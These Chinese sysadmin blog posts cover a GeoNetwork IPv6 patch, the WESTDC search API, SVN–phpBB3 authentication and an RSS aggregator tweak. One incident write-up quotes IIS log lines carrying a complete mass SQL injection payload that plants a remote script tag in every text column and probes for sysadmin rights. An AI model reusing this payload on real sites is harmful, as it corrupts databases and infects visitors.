geonetwork在ipv6会遇到一些奇怪的问题,无法搜索,无法添加新的元数据,无法上传缩略图。若在客户端禁掉IPV6,就可以解决这些问题。但这不是解决问题的办法。
因此,临时的解决办法就是不让geonetwork判断IP地址(其判断是否局域网,而这个功能对我们来说,没有意义)。
wlx@wlxpc:~/Projects/geonetwork-2.2.0/src/org/fao/geonet/kernel$ svn diff
Index: AccessManager.java
===================================================================
--- AccessManager.java (版本 3883)
+++ AccessManager.java (工作副本)
@@ -322,11 +322,13 @@
String network = settMan.getValue("system/intranet/network");
String netmask = settMan.getValue("system/intranet/netmask");
- long lIntranetNet = getAddress(network);
- long lIntranetMask = getAddress(netmask);
- long lAddress = getAddress(ip);
+ // to avoid ipv6 problem
+ //long lIntranetNet = getAddress(network);
+ //long lIntranetMask = getAddress(netmask);
+ //long lAddress = getAddress(ip);
- return (lAddress & lIntranetMask) == lIntranetNet ;
+ //return (lAddress & lIntranetMask) == lIntranetNet ;
+ return false;
}
//--------------------------------------------------------------------------
也向geonetwork官方汇报了这个问题,看看官方要怎么解决。
昨天晚上李老师打电话过来,发现西部数据中心访问有问题。
经仔细检查,发现网站已经被SQL注入了,SQL Server中所有字符串字段都被添加了尾巴,指向了一个病毒网站。
再次检查,发现最近的一次数据库完整备份是在年前了,而此期间又注册了很多新用户,因此只能手工清理了。
这里主要是利用了SQL Server中的replace函数:
update table set f1=replace(f1,'xxx','')
手工清理了所有表中的相关字段,这是个体力活。在清理过程中还发现了membership表中居然有4个重复用户名,这个错误检查了3-4个小时才发现,晕。
log记录显示了如何注入的:
6985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:02 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902};dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={616cf641-13dc-4f2a-ae40-6a4d8f42ddc6}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /dataservices/fullmetadata.aspx id={7ce7f0d6-7b5c-4136-82cb-eca3a2083902}%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 302 0 0
2008-05-27 00:08:03 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536362537352536332536422537352537352532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 218.246.32.206 Mozilla/4.0 200 0 64
2008-05-27 00:08:04 W3SVC1565836985 210.77.68.241 GET /useterms.aspx id=1%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1 80 - 218.246.32.206 Mozilla/4.0 200 0 0
因此,可以看到黑客是利用218.246.32.206这个机器来操作的,但搜索这个IP地址,居然发现多个结果,估计是利用工具攻击的。
同时,CSDN上还有一个自动的恢复方法,这比我手工恢复要省事多了。
发现,这个攻击是针对SQL Server的。
如何调用westdc的搜索功能?
WESTDC的搜索地址为:http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx
而参数的传递方法可以使用GET,也可以使用POST。
具体参数包括:
q, 全文搜索的关键词
e, 经度(东)
w, 经度(西)
s, 纬度(南)
n, 纬度(北)
比如,使用get方法的时候,您可以直接调用:
http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx?q=沙漠&e=100&w=50&s=50&n=70
也可以使用POST方法调用,代码如下:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
<form action="http://westdc.westgis.ac.cn/DataServices/SearchMetadata.aspx" method="post" name="form1">
<input type="text" name="q">
<input type="submit" value="submit">
</form>
</body>
</html>
效果如下:
整合,题目有点大,呵呵。
其实就是把SVN的用户控制交给phpbb3来进行处理。
要求SVN必须采用apache2/mod_auth_mysql来进行控制的。
然后在phpbb3的后台创建一个新的用户组,用于控制可以访问SVN服务的用户。然后在mysql里创建一个视图,提取用户名称和密码。注意,PHPBB3采用的加密方式是直接MD5。假设创建的组名为svn:
create view svnauth (username,passwd,groups) as select users.username,users.user_password,groups.group_name from groups,user_group left join users on user_group.user_id=users.user_id where groups.group_name="svn" and user_group.group_id=groups.group_id ;
然后在apache2的site文件里设置为:
Auth_MySQL_Encryption_Types PHP_MD5
这样就可以了,具体的操作还需要参考之前的文章:安装subversion: ssl+auth_mysql+mod_svn。
估计还需要mysql 5的支持,不知道mysql 4是否支持视图。
数据中心的BLOG系统采用RSS聚合程序,可以使个人还保留自己独立的BLOG系统。
目前最常用的是planetplanet系统,但是其是基于python开发的,而目前团队里还没有人了解python,因此就选择了moonmoon系统,虽然系统简陋一点,版本是0.2beta,但功能还是齐全的,开发语言是php。
tong的blog是msn space,而msn space目前还不支持基于分类的feed,因此只能进行代码端的定制。
修改app/classes/Planet.class.php文件,在286行附近添加一行:
if (strpos($person->website,"spaces.live.com")===false || $item->get_category()=="westdc")
这样就可以专门针对msn space的blog系统,提取固定分类的日志,如我这里提取的就是westdc分类。
剩下的工作就是对界面的定制,使其和整个系统一致。